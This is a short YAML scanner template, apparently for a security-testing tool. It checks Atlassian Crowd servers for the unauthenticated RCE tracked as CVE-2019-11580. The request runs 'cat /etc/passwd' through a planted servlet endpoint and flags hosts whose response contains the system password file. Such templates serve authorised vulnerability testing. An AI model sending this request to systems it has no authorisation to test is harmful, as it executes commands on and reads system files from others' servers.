id: crowd-unauth-rce
info:
  name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
  risk: Potential
  confidence: Tentative

params:
  - root: "{{.BaseURL}}"

replicate:
  ports: '8080'
  prefixes: 'jira, wiki, confluence, crowd'

requests:
  - method: GET
    redirect: false
    url: >-
     {{.root}}/plugins/servlet/exp?cmd=cat%20/etc/passwd
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash")

references:
  - links: https://github.com/jas502n/CVE-2019-11580
